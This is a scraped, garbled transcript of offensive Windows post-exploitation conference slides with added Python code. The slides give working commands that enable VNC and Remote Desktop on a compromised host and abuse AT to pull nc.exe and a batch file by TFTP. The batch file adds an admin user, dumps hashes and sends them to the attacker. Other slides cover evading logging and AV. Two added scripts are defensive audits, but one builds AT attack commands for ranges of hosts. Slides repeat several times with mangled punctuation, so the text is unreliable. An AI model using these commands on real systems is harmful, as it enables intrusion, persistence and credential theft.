"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: System controlling access to security doors
– No command line way of modifying the system, need GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote desktop is fast and already a feature of the OS
– However it’s often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

– This file will fix policy settings that are in your way
– Change “hacked_account” to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
• secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
• gpupdate /Force
• net start "terminal services"
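From the defender's side, the three files on slides 51, 53 and 54 (vnc.reg, fix_ts_policy.ini, enable_ts.reg) share one INI-like shape, so a single parser can audit exported registry fragments and secedit templates for exactly these changes. The following is an added example, not code from the talk; the sample inputs are constructed in the shape of the slide files (the VNC password bytes are a placeholder, not a real value) and the finding strings are my own.

```python
import re

# Constructed samples in the shape of the files shown on the slides (not copied
# verbatim; the VNC password bytes below are a placeholder, not a real hash).
SAMPLE_TS_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

SAMPLE_VNC_REG = r"""[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"Password"=hex:00,11,22,33,44,55,66,77
"""

SAMPLE_POLICY_INF = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = suspicious_account
seinteractivelogonright = suspicious_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

# Registry paths the slides touch (compared lower-cased).
TS_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
VNC_KEY_PREFIX = r"hkey_local_machine\software\orl\winvnc3"


def parse_ini_like(text):
    """Parse [section] / key=value text; covers .reg exports and secedit .inf.
    Section names and keys are lower-cased and stripped of quotes so that
    "fDenyTSConnections" in a .reg file matches a plain lookup."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().strip('"').lower()] = value.strip().strip('"')
    return sections


def reg_dword(value):
    """Decode a .reg 'dword:0000000a' value to int; None for any other type."""
    m = re.fullmatch(r"dword:([0-9a-f]{8})", value.lower())
    return int(m.group(1), 16) if m else None


def audit_registry_fragment(reg_text):
    """Flag the Terminal Server and WinVNC3 changes from slides 51 and 54."""
    findings = []
    for section, values in parse_ini_like(reg_text).items():
        if section == TS_KEY:
            if reg_dword(values.get("fdenytsconnections", "")) == 0:
                findings.append("terminal-server: fDenyTSConnections cleared (RDP enabled)")
            if reg_dword(values.get("tsenabled", "")) == 1:
                findings.append("terminal-server: TSEnabled set")
        elif section.startswith(VNC_KEY_PREFIX):
            findings.append("winvnc3: configuration key present")
            if "password" in values:
                findings.append("winvnc3: stored server password present")
            if reg_dword(values.get("socketconnect", "")) == 1:
                findings.append("winvnc3: SocketConnect enabled (listening server)")
    return findings


def audit_policy_template(inf_text):
    """Flag a secedit template that grants interactive logon rights and
    blanks the deny-logon lists, as fix_ts_policy.ini on slide 53 does."""
    rights = parse_ini_like(inf_text).get("privilege rights", {})
    findings = []
    for right in ("seremoteinteractivelogonright", "seinteractivelogonright"):
        if rights.get(right):
            findings.append(f"{right} granted to: {rights[right]}")
    for right in ("sedenyinteractivelogonright",
                  "sedenyremoteinteractivelogonright",
                  "sedenynetworklogonright"):
        if right in rights and rights[right] == "":
            findings.append(f"{right} emptied (deny list removed)")
    return findings


if __name__ == "__main__":
    for name, text in (("enable_ts.reg", SAMPLE_TS_REG), ("vnc.reg", SAMPLE_VNC_REG)):
        for f in audit_registry_fragment(text):
            print(f"{name}: {f}")
    for f in audit_policy_template(SAMPLE_POLICY_INF):
        print(f"fix_ts_policy.ini: {f}")
```

The same checks apply to a live host if the text is produced by `reg export` or `secedit /export` and fed to the two audit functions.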

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems

• Remember, this is POST exploitation, so you already have some access

• AT command schedules things to run at a specified time and date
– Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not

• AT is as good as having a shell
– Enable / Start Services
– Transfer files
– Adding users
– Messing with the registry / policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols; TFTP is good but not always “quiet” or available
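Each step of the AT-driven flow above leaves a host-side record: the service start-type changes from the sc commands, the scheduled task itself, and the account creation and group change the batch file performs. The following is an added example, not code from the talk, showing how a defender can correlate those records per host within a short time window; the event records are constructed in a simple pipe-delimited shape (not a real EVTX export), and the event IDs used are the standard Windows ones.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Standard Windows event IDs for the stages of the flow:
#   7040  service start type changed (System log, Service Control Manager)
#   4698  scheduled task created (Security log)
#   4720  user account created (Security log)
#   4732  member added to a security-enabled local group (Security log)
STAGES = {7040: "service-enabled", 4698: "task-scheduled",
          4720: "user-created", 4732: "added-to-local-group"}

# Constructed sample records: timestamp|host|event_id|detail
SAMPLE_EVENTS = """\
2024-01-10T12:00:05|WS01|7040|netdde start type changed from disabled to auto start
2024-01-10T12:00:06|WS01|7040|clipsrv start type changed from disabled to auto start
2024-01-10T12:01:10|WS01|4698|task At1 created by NT AUTHORITY\\SYSTEM
2024-01-10T12:02:30|WS01|4720|user account hacked created
2024-01-10T12:02:31|WS01|4732|hacked added to Administrators
2024-01-10T08:15:00|WS02|4720|user account svc_backup created
2024-01-10T17:40:00|WS03|4698|task NightlyCleanup created by DOMAIN\\admin
"""


def parse_events(text):
    """Turn the pipe-delimited sample into (timestamp, host, event_id, detail)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, eid, detail = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, int(eid), detail))
    return events


def correlate(events, window=timedelta(minutes=10), min_stages=3):
    """Return {host: [stage names]} for hosts on which at least `min_stages`
    distinct stages of the flow occur within `window` of each other.
    A lone account creation or a single scheduled task never fires; the
    chain service-change -> task -> user -> group membership does."""
    by_host = defaultdict(list)
    for ts, host, eid, _detail in events:
        if eid in STAGES:
            by_host[host].append((ts, STAGES[eid]))
    hits = {}
    for host, recs in by_host.items():
        recs.sort()
        for i, (start, _) in enumerate(recs):
            stages = []
            for ts, stage in recs[i:]:
                if ts - start > window:
                    break
                if stage not in stages:
                    stages.append(stage)
            if len(stages) >= min_stages:
                hits[host] = stages
                break
    return hits


if __name__ == "__main__":
    for host, stages in correlate(parse_events(SAMPLE_EVENTS)).items():
        print(f"{host}: {' -> '.join(stages)}")
```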

Page 31: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 32: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
  • Establish an authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
    – Write a batch file that executes everything at once
    – Have the target send you back whatever info you want
    – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i us GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends the hashes, identified by IP, back to the attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts

• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts

• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
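The planner below is an added example, not the speakers' AtAbuse or MassNetUse code. It implements the "Building a tool around AT" flow from the earlier slides (authenticate, read the target's clock, stage a fetch one minute out and the run a minute later) for a list of hosts, and it only builds the command lines so they can be reviewed and logged before anything is sent. The hostname, credentials, attacker IP and the `net time` / `at` output strings are constructed for the example; the parser assumes the US-locale `net time` format shown.

```python
"""Plan AT-scheduler jobs across a range of hosts (added example, not the talk's tool)."""
import re
from datetime import datetime, timedelta

# Constructed `net time \\VICTIM01` output (XP/2003, US locale, no seconds).
SAMPLE_NET_TIME = (
    "Current time at \\\\VICTIM01 is 3/14/2008 11:59 PM\r\n"
    "\r\nThe command completed successfully.\r\n"
)
# Constructed reply from a successful `at \\host HH:MM "cmd"`.
SAMPLE_AT_REPLY = "Added a new job with job ID = 7\r\n"

_NET_TIME_RE = re.compile(
    r"Current time at \\\\(?P<host>\S+) is "
    r"(?P<date>\d{1,2}/\d{1,2}/\d{4}) "
    r"(?P<time>\d{1,2}:\d{2}(?::\d{2})?)\s*(?P<ampm>AM|PM)?",
    re.IGNORECASE,
)
_JOB_ID_RE = re.compile(r"job ID = (\d+)")


def parse_net_time(output):
    """Return (hostname, datetime) from `net time \\host` output.

    Seconds are optional because older builds do not print them; that is why
    schedule_time() rounds up rather than trusting "now + 1 minute".
    """
    m = _NET_TIME_RE.search(output)
    if not m:
        raise ValueError("unrecognised net time output")
    ampm = m.group("ampm")
    has_sec = m.group("time").count(":") == 2
    fmt = "%m/%d/%Y " + ("%I" if ampm else "%H") + ":%M" + (":%S" if has_sec else "")
    stamp = f"{m.group('date')} {m.group('time')}"
    if ampm:
        fmt += " %p"
        stamp += f" {ampm.upper()}"
    return m.group("host"), datetime.strptime(stamp, fmt)


def schedule_time(target_now, minutes_ahead=1):
    """Clock time to hand to AT so the job fires at least minutes_ahead minutes out.

    AT resolves to the minute and fires at HH:MM:00. If the target reads
    11:59:50 (or reported no seconds at all), dropping the seconds and adding
    one minute leaves ten seconds or less of margin, so round UP to the next
    whole minute first. AT takes 24-hour HH:MM, which also avoids AM/PM.
    """
    next_full_minute = target_now.replace(second=0, microsecond=0) + timedelta(minutes=1)
    return next_full_minute + timedelta(minutes=minutes_ahead)


def parse_job_id(at_output):
    """Job ID from AT's 'Added a new job with job ID = N' reply, else None.

    Check this after every at call: with no shell on the box, a missing job ID
    is the only sign that the Schedule service is stopped or the session is
    not authenticated.
    """
    m = _JOB_ID_RE.search(at_output)
    return int(m.group(1)) if m else None


def plan_host(net_time_output, user, password, attacker_ip, stage_file="e.bat"):
    """Command lines for one host: authenticate, fetch the stage, run it (as SYSTEM)."""
    host, now = parse_net_time(net_time_output)
    t_fetch = schedule_time(now, 1)   # TFTP pull one minute out (noisy on some networks)
    t_run = schedule_time(now, 2)     # execute the batch file a minute after that
    return host, [
        f"net use \\\\{host}\\ipc$ {password} /user:{user}",
        f'at \\\\{host} {t_fetch:%H:%M} "tftp -i {attacker_ip} GET {stage_file}"',
        f'at \\\\{host} {t_run:%H:%M} "{stage_file}"',
    ]


def plan_range(net_time_outputs, user, password, attacker_ip):
    """One plan per host, keyed by hostname, from a batch of net time outputs."""
    plans = {}
    for output in net_time_outputs:
        host, cmds = plan_host(output, user, password, attacker_ip)
        plans[host] = cmds
    return plans


if __name__ == "__main__":
    for host, cmds in plan_range([SAMPLE_NET_TIME], "admin", "Passw0rd", "10.0.0.5").items():
        print(f"# {host}")
        print("\n".join(cmds))
    print("queued job:", parse_job_id(SAMPLE_AT_REPLY))
```

Because the target's clock, not yours, decides when the job fires, the plan is always derived from the target's own `net time` answer; a host whose clock is minutes off from yours would otherwise get a job that either fires immediately or a day later.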

Slide 66

• DEMOS

